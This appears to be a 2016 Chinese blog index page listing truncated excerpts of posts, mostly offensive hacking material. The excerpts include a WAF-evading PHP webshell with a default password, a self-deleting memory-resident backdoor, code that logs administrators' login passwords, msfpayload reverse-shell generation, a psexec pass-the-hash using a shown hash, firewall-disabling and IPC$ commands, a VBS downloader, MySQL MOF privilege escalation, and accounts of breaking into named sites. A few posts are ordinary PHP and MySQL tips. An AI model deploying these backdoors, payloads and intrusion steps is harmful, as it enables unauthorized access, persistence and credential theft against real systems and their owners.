摘要: 最近发现一款过狗shell,分享下。。。 本地搭建2008SERVER+php5+阿帕奇+网站安全狗+服务器安全狗+防护全开 测试可用。。。 默认密码:p0tt1 使用方法: 访问webshell页面,出现404,没关系,按p键,输入密码 或者webshell.php?password=p0tt1自定义密码在 p0tt1为设定的密码,可以自行修改... 阅读全文
posted @ 2016-01-23 21:15 h4ck0ne 阅读(1489) 评论(0) 推荐(0)
摘要: echo是PHP语句, print和print_r是函数,语句没有返回值,函数可以有返回值(即便没有用)print()只能打印出简单类型变量的值(如int,string)例子输出3print_r()可以打印出复杂类型变量的值(如数组,对象),如果让数组分行显示就需要加echo "";print_r(... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(1667) 评论(0) 推荐(0)
摘要: 刚开始学习ThinkPHP就遇到这种问题,还是自己粗心。 错误如下: 原因:开启调试模式,区分大小写的,要把模块名首字母大写就OK了。也就是: [plain]view plaincopy http://localhost/php/fanhuar/index/index.php/in... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(394) 评论(0) 推荐(0)
摘要: 本帖最后由 小项 于 2016-1-21 11:41 编辑一、写入文件1.打开资源(文件)fopen($filename,$mode)2.写文件fwrite($handle,$str)3.关闭文件fclose($handle)4.一步写入file_put_contents($filename,$st... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(228) 评论(0) 推荐(0)
摘要: Author:雪碧 http://weibo.com/520613815 此篇文章技术含量不高,大牛不喜勿喷,Thx!写这篇文章主要是为了各位小伙伴在SAE搭建XSSING平台的时候少走点弯路(同志们 我先去前面帮你们填好坑 =。=) 引用 XSSING平台开源中国资料: xssing ... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(619) 评论(0) 推荐(0)
摘要: 有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过大家都懒得测试,我就来整理下.1.普通本地包含;poc:http://127.0.0.1:808... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(528) 评论(0) 推荐(0)
摘要: cnrstar (Be My Personal Best!) | 2014-05-20 21:58众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件,但是偶尔在一个网站上发现个小技巧,也就是通过... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(1760) 评论(0) 推荐(0)
摘要: (1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集使用方法如下: $sql = "select count(*) as ctr from users where username ='".... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(472) 评论(0) 推荐(0)
摘要: 今天在做上传的时候出现一个非常怪的问题,有时候表单提交可以获取到值,有时候就获取不到了,连普通的字段都获取不到了,苦思冥想还没解决,群里人问我upload_max_filesize的值改了吗,我说改了啊,。过了一会问post_max_size改了吗,,原来上传是和post_max_size有关系的。... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(196) 评论(0) 推荐(0)
摘要: 彻底解决mysql中文乱码的办法mysql -uroot -p 回车输入密码 进入mysql查看状态如下:mysql \s mysql不能插入中文默认的是客户端和服务器都用了latin1,所以会乱码。解决方案: mysql>user mydb;mysql>alter database mydb... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(321) 评论(0) 推荐(0)
摘要: 有人说,前端的界限就在浏览器那儿。无论你触发了多少bug,最多导致浏览器崩溃,对系统影响不到哪去。这就像二次元各种炫酷的毁灭世界,都不会导致三次元的世界末日。然而,作为一个前端,我发现是有方式打开次元大门的…这个实验脑洞较大,动机无聊,但某种意义上反映了一些安全问题。想象一下,有天你在家里上网,吃着... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(346) 评论(0) 推荐(0)
摘要: 修改mysql数据库的默认编码方式修改my.ini文件 加上 default-character-set=gb2312设定数据库字符集 alter database da_name default character set 'charset'1)设置数据库编码 /etc/my.cnf[... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(213) 评论(0) 推荐(0)
摘要: 记录下来 经常用到 电脑准备格式化了 一切从头开始 每天浑浑噩噩的不知道干什么。认准一样东西 认认真真的学 IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, ht... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(6677) 评论(1) 推荐(0)
摘要: 因为自己时常用到所以还是发布一下吧/** * 发送post请求 * @param string $url 请求地址 * @param array $post_data post键值对数据 * @return string */function send_post($url, $post_data) ... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(305) 评论(0) 推荐(0)
摘要: 免责声明:本文旨在分享技术进行安全学习,禁止非法利用。 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0,并使用TP-LINK TLWN722N (150Mbps 版本)作为我的二级... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(993) 评论(1) 推荐(0)
摘要: 有经验的老鸟们就不用看了。(大牛绕过)我们每当渗透一个站点的时候必须要了解他的信息。这是最基础也是最基本的常识。第一要看网站是什么脚本? 是什么程序? 有多少类的程序?系列:http://www.zzrsks.com/这个站点我们可以看出是伪静态的。那么如何判断他是属于什么脚本的呢?有很多种方法我就... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(497) 评论(0) 推荐(0)
摘要: 后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码例如txt里面写了一句这样的代码 file_put_contents('./1.php',"");这样就会在... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(2705) 评论(1) 推荐(0)
摘要: MS10-070 ASP.NET Padding Oracle信息泄露漏洞1 漏洞描述:ASP.NET由于加密填充验证过程中处理错误不当,导致存在一个信息披露漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据,例如视图状态。 此漏洞还可以用于数据篡改,如果成功利用,可用于解密和篡改服务器加密的... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(1368) 评论(0) 推荐(0)
摘要: 1.什么是BeEF?就是The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。大概长这个样子(默认用户... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(578) 评论(0) 推荐(0)
摘要: sh 无密码登录要使用公钥与私钥。linux下可以用用ssh-keygen生成公钥/私钥对,下面我以CentOS为例。有机器A(192.168.1.155),B(192.168.1.181)。现想A通过ssh免密码登录到B。1.在A机下生成公钥/私钥对。 [chenlb@A~]$ssh-keyg... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(311) 评论(0) 推荐(0)
摘要: Hydra词出自希腊神话,原意是是九头蛇,后被赫拉克罗斯所杀,成为赫拉克罗斯的12件伟大功绩之一。而在计算机上HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。支持ssh,RDP,Mysql,Oracle,http,FTP等诸多协议的暴力破解hydra参数详解root@kali:~... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(465) 评论(0) 推荐(0)
摘要: 前言 中国菜刀是一个一句话连接工具,最后一版编译于20141213,时至今日仍然是一款优秀的工具。虽然菜刀本身在与服务器通信的时候做了二次编码,但到现在已经被各种WAF杀成狗。而菜刀也是没有开源的,今天就来给大家讲讲二次开发菜刀,为菜刀添加接口。定位发送函数 下断点:HttpSendReques... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(1177) 评论(0) 推荐(0)
摘要: 没做免杀之前,被狗咬死: 直接上代码: $p=realpath(dirname(__FILE__)."/../").$_POST["a"];$t=$_POST["b"];$tt="";for ($i=0;$i@fwrite(fopen($p,"w"),$tt);echo "success!"... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(809) 评论(0) 推荐(0)
摘要: 有些一句话虽然可以单独成功执行,但是在菜刀里却不能用,而有些人非觉得这样的一句话麻烦,非要用菜刀。经分析安全狗对菜刀的HTTP请求做了拦截,菜刀的POST数据里面对eval数据做了base64编码,安全狗也就依靠对这些特征来拦截,因此要想正常使用菜刀,必须在本地做一个转发,先把有特征的数据转换。这个... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(4807) 评论(0) 推荐(0)
摘要: 为了避免自己辛辛苦苦拿下的站点被一些拿来主义者不费吹灰之力就据为己有,下面来教大家如何检测菜刀有没有留后门。对于有没有后门这个问题,大牛们会说抓包看一下就行了,那如何抓包呢?有很多软件可以,这里使用的是Fiddler2(免费,E文,下载地址请问谷歌)。另外由于菜刀本身不支持代理,所以我们需要一款软件... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(2642) 评论(0) 推荐(0)
摘要: SQL注入:至于+ /**/就不说了,来些实际的。1、关键字可以用%(只限IIS系列)。比如select,可以sel%e%ct。原理:网络层waf对SEL%E%CT进行url解码后变成SEL%E%CT,匹配select失败,而进入asp.dll对SEL%E%CT进行url解码却变成select。II... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(7008) 评论(0) 推荐(0)
摘要: 合购vip等教程论坛都用的是Discuz看操作步骤: 随便找一处vip教程 接下来 我们审查元素 找到这段代码然后修改回复复制代码 xxx.xxxx.xx代表该论坛的网址合购vip就用 <a href="http://www.hegouvip.com/forum.php?mod=post... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(1128) 评论(0) 推荐(0)
摘要: 1、官网环境要求:n5 n7 n10 android 4.42、实验设备:N7 android 4.4.4N7 android 4.4.3N5 nadroid 4.4.23、开发者模式+usb调试+解锁+root(一般刷过机的这些肯定都搞定了) 5、安装busybox + TWRP6、开启M... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(4999) 评论(0) 推荐(0)
摘要: 看到很多人都想找一些奇葩,或者国内很少见的电影,你们还在百度,微盘上搜索么?还在人人影视上溜达么?以下收集各大电影网站,绝对能满足你们!如果你不是那么热爱电影,只是闲暇之余看看热门的新片/美剧,不求画质与速度的话,那么下面这几个网站已经能满足你了........电影天堂:链接地址飘花电影:链接地址6... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(6082) 评论(0) 推荐(0)
摘要: #1 实例介绍本案例采用的实例是:U-Mail邮件系统。U-Mail邮件系统文件上传的地方代码是这样的: code 区域 0, "message" => el( "不支持该扩展名文件上传", "" ) ) ); } $path_target = get... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(463) 评论(0) 推荐(0)
摘要: 今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下Uc_server默认密码其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿先说一下UCkey拿shell,... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(2173) 评论(0) 推荐(0)
摘要: 常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息 只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(2630) 评论(0) 推荐(0)
摘要: 知乎上看到一题主询问:"自学PHP有哪些书籍和教程值得推荐?",互联网深度屌丝秦风给出了不错的答案,希望能够帮助自学PHP的朋友们。 以下仅供参考: 尤其不认可W3school之类的东西,不够深度,理解不深,比起这个更建议看官方文档,中文不清楚,看英文的。 入门视频: 入门视频推... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(1581) 评论(0) 推荐(0)
摘要: x01 reverse the shell File通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shellr... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(2360) 评论(0) 推荐(0)
摘要: 0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识、理解、学习。这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦。如果在阅读中有任何问题都可以与我邮件联系(contact@x0day.me)0x01 在kali中使用m... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(505) 评论(0) 推荐(0)
摘要: 0x01 背景 meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(829) 评论(0) 推荐(0)
摘要: 0x00前言 上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携、易扩展 0x02特点 提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而... 阅读全文
posted @ 2016-01-23 17:49 h4ck0ne 阅读(668) 评论(0) 推荐(0)
摘要: 0x00 前言 上月底,WinRAR 5.21被曝出代码执行漏洞,Vulnerability Lab将此漏洞评为高危级,危险系数定为9(满分为10),与此同时安全研究人员Mohammad Reza Espargham发布了PoC,实现了用户打开SFX文件时隐蔽执行攻击代码,但是WinRAR官... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(1252) 评论(0) 推荐(0)
摘要: 一、msfconsole? 帮助菜单back 从当前环境返回banner 显示一个MSF bannercd 切换目录color 颜色转换connect 连接一个主机exit 退出MSFhelp 帮助菜单info 显示一个或多个模块的信息irb 进入irb脚本模式j... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(233) 评论(0) 推荐(0)
摘要: 0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xs... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(661) 评论(0) 推荐(0)
摘要: 先对目标站进行信息收集:扫了下目录,iis6,发现了后台,并且存在目录遍历: 存在目录遍历我寻思着找点有用的东西,看看有没有前人留下的脚印啥的,直接踩上去多方便,但是翻了一半天无果。从前台找找有没有有用的东西,发现新闻更新的挺勤的,说明管理员还是经常上线,想着x点cookie,结果找遍了都没有... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(1647) 评论(0) 推荐(0)
摘要: 智能手机的存在让网民的生活从PC端开始往移动端转向,现在网民的日常生活需求基本上一部手机就能解决。外卖,办公,社交,银行转账等等都能通过移动端App实现。那么随之也带来了很多信息安全问题,大量的用户信息储存在移动App中,由于移动App的开发并不健全,由移动App引发的用户信息泄露事件也层出不穷。 ... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(670) 评论(0) 推荐(0)
摘要: 在补天平台经常看到@合肥滨湖虎子这样的大牛刷通用,这些通用系统有开源的也有不开源的。但是像用友,shopex这些非开源系统做黑盒测试,会非常困难。作为新闻专业的学生我很好奇:这些大牛到底是通过什么方法审计到这些系统漏洞呢?为了一探究竟,我带上了肥皂,备好了菊花,找到了补天某通用大牛进行了一次面对面的... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(445) 评论(0) 推荐(0)
摘要: 在网上搜到一处 鹏博士oa的入口:http://124.207.189.73/defaultroot/login.jsp 随即猜测口令 test test123 注意在IE下使用成功登陆其oa系统,是ezoffice的:这套系统在新建这里通过更改路径等方式可以getshell,其只限制了部分目录下... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(476) 评论(0) 推荐(0)
摘要: 0x01 大体思路在安卓75%的市场占有率下,形形色色的安卓应用层出不穷,随之而来的便是大波的漏洞。在各类市场中随意翻一下,几乎都是连接网络的应用,这在给用户惬意体验的同时也给我们漏洞挖掘带来了机会。当前无论是web网页,还是基于网络的安卓应用,免不了都要用http协议来与服务器通信,提交用户的更改... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(550) 评论(0) 推荐(0)
摘要: Metaspliot进行漏洞扫描 Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作为一个渗透测试系统。最初是由HD Moore在2003年创建作为一种便携式网络工具包。它是所有的安全研... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(2645) 评论(0) 推荐(0)
摘要: 转载 Seay_法师 最近生活有很大的一个变动,所以博客也搁置了很长一段时间没写,好像写博客已经成了习惯,搁置一段时间就有那么点危机感,心里总觉得不自在。所以从今天起还是要继续拾起墨笔(键盘),继续好好维护这个博客,写出心里最真实的想法,写出平时接触到的一些人和事以及一些新的技术。当然写博客也不是... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(1777) 评论(0) 推荐(0)
摘要: 第一部分是指在Android系统的手机上直接写PHP脚本代码并立即运行;第二部分则继续讲解如何把写好的PHP脚本代码打包成akp安装文件。 首先,在手机上安装两个apk包。 一个是SL4A(Scripting Layer for Android),这个是Android的脚本环境,前身是ASE... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(1374) 评论(0) 推荐(0)
摘要: Cookies想必所有人都了解本文将围绕Cookies基础知识(什么是Cookies/Cookies如何传递/Cookies如何存储/Cookies如何查看)Cookies高级知识/Cookie的限制等等方方面面深入了解,感兴趣的朋友可以参考下,或许对你学习cookies有所帮助一,前言 Cook... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(407) 评论(0) 推荐(0)
摘要: 抓取windows hash值 得到administrator的hash:598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFmsf调用payload: use exploit/windows/smb/psexec ... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(2179) 评论(0) 推荐(0)
摘要: 在windows下:打开命令行窗口,停止mysql服务:Net stop mysql在cmd下启动mysql,一般到mysql的安装路径,找到mysqld-nt.exe执行:mysqld-nt --skip-grant-tables当前窗口将会停止。执行mysql 如果提示没有这个命令,先进入MYS... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(120) 评论(0) 推荐(0)
摘要: 本文将科普下metasploit隧道代理的使用技巧。 0×00 获取meterpreter 1.首先生成可执行文件 root@kali:~#msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.101.105LPORT=444X>m... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(251) 评论(0) 推荐(0)
摘要: 0x00 什么是域 有人说域是一种组织结构,是个安全边界。域也有另为一个名字,"活动目录"。不管域是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为域就是建立在计算机上的。加入域里的计算机,共享文件,共享上网就会很方便。 域里有个... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(1120) 评论(0) 推荐(0)
摘要: 开启服务 net start Schedulenet start wmiApSrv关闭防火墙 net stop sharedaccessnet use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$试环境:主机(w... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(7028) 评论(0) 推荐(0)
摘要: 首先确定这个网站使用thinkphp的框架国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考admin是后台工程文... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(5008) 评论(0) 推荐(0)
摘要: 当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望一、VBS下载者: 复制代码 代码如下:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObjec... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(517) 评论(0) 推荐(0)
摘要: 今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 ... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(3290) 评论(0) 推荐(0)
摘要: 经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。<?phpfile_put_contents('xpxp.php',"$_GET[... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(269) 评论(0) 推荐(0)
摘要: 经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(4864) 评论(0) 推荐(0)
摘要: PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WIT... 阅读全文
posted @ 2016-01-23 17:48 h4ck0ne 阅读(2172) 评论(0) 推荐(0)
摘要: 前言 Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1795) 评论(1) 推荐(1)
摘要: 0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携、易扩展 0x02特点 提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而是替代它 原因如下: 1、ettercap很成功,但在新时代下它已经老了 2、et... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(595) 评论(0) 推荐(0)
摘要: 0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: ... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1390) 评论(0) 推荐(0)
摘要: 0x00 前言 上一篇学习了如何导出域内所有用户hash,那么,接下来准备用破解出的用户名口令尝试远程登陆目标主机并执行程序,结合实际环境做了如下测试.0x01 目标 远程登陆目标主机执行测试程序 0x02 测试环境 远程主机: ip:192.168.40.137 ... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(2727) 评论(0) 推荐(0)
摘要: 0x00目标: 导出当前域内所有用户的hash0x01测试环境: 域控:server2008 r2杀毒软件:已安装*域控权限:可使用net use远程登陆,不使用33890x02测试方法: (1)mimikatz: hash数量:只能抓取登陆过的用户hash,无法抓取所有... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(2421) 评论(0) 推荐(0)
摘要: 你急有毛用,我电脑没带,怎么搞? 联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽, 由于我无法电脑操作,我又给他提供了一些思路,php无法... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1148) 评论(0) 推荐(0)
摘要: 经常在服务器提权的时候,尤其是windows环境下,我们发现权限不高,却可以读取mysql的datadir目录,并且能够成功下载user.MYD这个文件。但是在读取内容的时候,经常会遇到root密码hash不完整的情况,手头又没有mysql环境或者 导入出错..可试试下列方法 看图 ... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(2106) 评论(0) 推荐(0)
摘要: 我们这次的目标有点敏感性感的马赛克是必须有的 登陆表单 那么我们来看看是不是存在post注入 Setp1:设置代理 Step2:账户admin密码随意提交上去抓个包 把抓到的包复制到本地的一个文本里 Sqlmap走起 Sqlmap-r"/tmp/bing... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(264) 评论(0) 推荐(0)
摘要: 我们在这个建2个号,一个叫大黑阔,另一个叫小黑阔 我们点击找回密码 邮件来了 我们重置密码,然后抓包,我修改密码为qq123456 然后我们吧 中的邮箱换成,我们的小黑阔,2674426025@qq.com 成功重置密码为qq123456。 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(315) 评论(0) 推荐(0)
摘要: 某个接口页面存在oracle盲注,可以获得当前用户数据库,dump教师用户表,分析密文加密特征(前人研究成果+基友助攻),破译加密的密码。前台管理员登陆,后台文件上传基于黑名单原理,过滤u完全,上传特定文件,生成一句话。菜刀连接,大马提权。百度搜索:"欢迎使用正方教务管理系统!请登录" 可获得几十页... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1722) 评论(0) 推荐(0)
摘要: php截取后台登陆密码的代码,很多时候黑客留了这样的代码,大家一定要注意下if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(263) 评论(0) 推荐(0)
摘要: Burp Suite使用介绍(一) 小乐天·2014/05/01 19:54Getting Started Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1856) 评论(0) 推荐(0)
摘要: x01 准备工作 测试环境: 1) 手机root权限 2) Adb.exe3) 手机usb连接开启debug模式(在设置>关于手机>连续点击多次版本号,即可开启开发者模式)4) Window下安装drozer 5) 安装完drozer后在其目录下把agent.apk安装到手机 ... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(436) 评论(0) 推荐(0)
摘要: 挖掘过程一: 自从上一次投稿,已经好久好久没写文章了。今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得。在我看来。Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(447) 评论(0) 推荐(0)
摘要: Fiddler的基本介绍 Fiddler的官方网站:www.fiddler2.com Fiddler官方网站提供了大量的帮助文档和视频教程, 这是学习Fiddler的最好资料。 Fiddler是最强大最好用的Web调试工具之一,它能记录所有客户端和服务器的http和ht... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(161) 评论(0) 推荐(0)
摘要: 一、硬盘分区 分区还是用PE下最常用的DiskGenius,可直接使用"快速分区"功能对硬盘进行分区。分区表类型选择GUID,勾选建立ESP分区。ESP分区非常重要,用于存放系统引导文件。测试发现,如果不创建ESP分区会导致系统无法引导。这里不扯动态磁盘,就不讲MSR分区,但可以建立。建议... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(4119) 评论(0) 推荐(0)
摘要: 获取cookie利用代码cookie.asp xx 把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。XSS构造语句 把上述语句放到... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(22136) 评论(0) 推荐(0)
摘要: 很多人都想知道最受欢迎的10个Metasploit模块和插件是什么(TOP10),事实上这是一个很难回答的问题,因为什么才叫"Top"?我想每个人都有每个人的看法。于是我们通过调查metasploit官网的数据,尤其是Metasploit Auxiliary and Exploit 数据库,对这些e... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(866) 评论(0) 推荐(0)
摘要: 以上是 我做的幻灯片 介绍什么是WebDAV 有什么用漏洞测试需要的工具 http://pan.baidu.com/s/1o6DYxAE看到这里 说明直接远程溢出 提升权限为system 这些都很久以前的老漏洞了 我以前看过 现在发出来没... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1096) 评论(0) 推荐(0)
摘要: 基本语法: #nmap [扫描方式] [命令选项] {目标}扫描目标格式: IPv4 地址: 192.168.1.1IPv6 地址:AABB:CCDD::FF%eth0主机名:www.target.tgtIP 地址范围:192.168.0-255.0-255掩码格式:192.168.0.0/16... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(137) 评论(0) 推荐(0)
摘要: 今天在来一个mysql提权 (也可以说是默认system权限提的)在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\c... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(1256) 评论(0) 推荐(0)
摘要: 1.禁止ping/etc/rc.d/rc.localecho 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all2.对用户和口令文件进行权限控制chmod 600 /etc/passwdchmod 600 /etc/shadowchmod 600 /etc/gro... 阅读全文
posted @ 2016-01-23 17:47 h4ck0ne 阅读(297) 评论(0) 推荐(0)
